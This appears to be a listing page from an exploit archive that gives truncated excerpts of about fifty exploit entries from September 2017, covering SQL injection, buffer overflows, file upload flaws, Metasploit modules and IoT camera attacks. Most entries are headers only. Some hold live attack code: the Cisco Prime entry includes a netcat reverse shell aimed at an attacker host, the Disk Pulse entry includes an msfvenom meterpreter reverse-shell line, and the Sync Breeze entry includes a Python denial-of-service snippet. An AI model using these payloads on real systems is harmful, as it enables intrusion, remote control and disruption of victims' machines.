ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download
Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...
Easy Blog PHP Script 1.3a - 'id' SQL Injection
Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection Date: 2017-09-27 Exploit Author: 8bitsec Vendor Homepage: https://www.codester.com/ Software Link: https://www.codester.com/items/4616/easy-blog-php-script Version: 1.3a Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected]...
DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...
Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com...
Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ========...
Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ===========...
Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution
Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability Date: September 28th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 7/Server 2008/Vista/Serve...
DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)
!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow (PoC) Date: 28-09-2017 Website: www.touhidshaikh.com Vulnerable...
Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...
Real Estate MLM plan script 1.0 - 'srch' SQL Injection
Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.mlmscript.in/ Software Link: http://www.mlmscript.in/real-estate-mlm-script.html Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...
Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: =========== OfficeScan v11.0 and XG 12.0...
PHP Multi Vendor Script 1.02 - 'sid' SQL Injection
Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.dexteritysolution.com/ Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html Version: 1.02 Tested on: Kali Linux 2.0 |...
Roteador Wireless Intelbras WRN150 - Autentication Bypass
Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN 150 Date: 28/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150 Mbps - WRN 150 Tested on: kali linux, windows 7, 8.1, 10 For more info:...
Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG...
Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG 12.0...
LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)
require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The vulnerability is triggered when sending a series of dot dot slashe...
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $GET'uploaddir' is not escaped a...
SmarterStats 11.3.6347 - Cross-Site Scripting
---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries ---------------------------- Author: David Hoyt Date:...
Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution
Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow, Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html Affected Version...
Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)
!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...
Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...
NodeJS Debugger - Command Injection (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "NodeJS Debugger Command Injection", 'Description' = %q This module uses the "evaluate" request type of the NodeJS V8 debugger protocol version 1 t...
Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation
/ CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x86_64 and 3.10.0-514.26.1.el7.x86_64 Copyright (C) 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
WordPress Plugin WPGYM - SQL Injection
Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/ Version...
WordPress Plugin Hospital Management System - SQL Injection
Exploit Title: Hospital Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/hospital-management-system-for-wordpress/12094634 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/hospital/...
Job Links - Arbitrary File Upload
Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo: http://teamworktec.com/demo/job-links/ Version:...
Tiny HTTPd 0.1.0 - Directory Traversal
====================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal Date: 26-09-2017 Website: www.touhidshaikh.com Vulnerable Software: Tiny HTTPd Version: 0.1.0 Download Link:...
AMC Master - Arbitrary File Upload
Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Demo:...
TicketPlus - Arbitrary File Upload
Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo: http://sportsgrand.com/demo/ticketplus/...
WordPress Plugin School Management System - SQL Injection
Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/...
SMSmaster - SQL Injection
Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...
Photo Fusion - Arbitrary File Upload
Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo: http://teamworktec.com/demo/photos-fusion/ Version: N/...
WordPress Plugin WPCHURCH - SQL Injection
Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...
WordPress Plugin WPAMS - SQL Injection
Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...
Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 The exploit gains code execution on the Wi-Fi firmware on the iPhone 7. The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 14C92, but should work on all versions of iOS up to 10.3.3 included. However...
Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes)
Linux/x86_64 - mkdir() 'evil' Shellcode (30 bytes). Shellcode exploit for Linx86-64 platform / ;Title: Linux/x86_64 - mkdir() shellcode (30 bytes) ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x86_64 ;Description: Create Folder with 755...
FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution
!/bin/bash FLIR Systems FLIR Thermal Camera PT-Series PT-334 200562 Remote Root Exploit Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.3.4 GA, 1.3.3 GA and 1.3.2 Summary: FLIR's PT-Series of...
FLIR Thermal Camera F/FC/PT/D - SSH Backdoor Access
FLIR Systems FLIR Thermal Camera F/FC/PT/D Hard-Coded SSH Credentials Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID...
Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321 The attached MP4 file causes an out-of-bounds memory access when played in flash player. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42781.zip...
Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow
Exploit Title:Oracle 9i XDB HTTP PASS Buffer Overflow Date: 09/25/2017 Exploit Author: Charles Dardaman Twitter: https://twitter.com/CharlesDardaman Website: http://www.dardaman.com Version:9.2.0.1 Tested on: Windows 2000 SP4 CVE: 2003-0727 This is a modified stand alone exploit of...
FLIR Thermal Camera FC-S/PT - Command Injection
FLIR Systems FLIR Thermal Camera FC-S/PT Authenticated OS Command Injection Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC PT-Series...
Adobe Flash - Out-of-Bounds Read in applyToRange
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323 The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42783.zip...
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322 The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42782.zip...
FLIR Thermal Camera F/FC/PT/D - Information Disclosure
FLIR Systems FLIR Thermal Camera F/FC/PT/D Multiple Information Disclosures Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series...
Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)
Tested on Windows XP SP3 x86 The application requires to have the web server enabled. !/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def sendegghunterrequest: msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.228.158 LPORT=443 -f py buf =...
FLIR Thermal Camera F/FC/PT/D - Stream Disclosure
FLIR Systems FLIR Thermal Camera F/FC/PT/D Stream Disclosure Vendor: FLIR Systems, Inc. Product web page: http://www.flir.com Affected version: Firmware version: 8.0.0.64 Software version: 10.0.2.43 Release: 1.4.1, 1.4, 1.3.4 GA, 1.3.3 GA and 1.3.2 FC-Series S FC-334-NTSC FC-Series ID FC-Series-R...
Supervisor 3.0a1 < 3.3.2 - XML-RPC (Authenticated) Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Supervisor XML-RPC Authenticated Remote Code Execution", 'Description' = %q This module exploits a vulnerability in the Supervisor process control...
HBGK DVR 3.0.0 build20161206 - Authentication Bypass
Exploit Title: HBGK DVR V3.0.0 build20161206 - Authentication Bypass Date: 24-09-2017 Vendor Homepage: http://www.hbgk.net/en/ Exploit Author: RAT - ThiefKing Contact: https://www.facebook.com/cctvsuperpassword Website: http://tromcap.com Category: webapps Tested on: V2.3.1 build20160927, V3.0.0...
CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
!/usr/bin/python Exploit Title: CyberLink LabelPrint =2.5 File Project Processing Unicode Stack Overflow Date: September 23, 2017 Exploit Author: f3ci Vendor Homepage: https://www.cyberlink.com/ Software Link:...
Secure E-commerce Script 1.02 - 'sid' SQL Injection
Exploit Title: Secure E-commerce Script v1.02 - SQL Injection Date: 2017-09-22 Exploit Author: 8bitsec Vendor Homepage: http://www.phpscriptsmall.com/ Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/ Version: 1.02 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...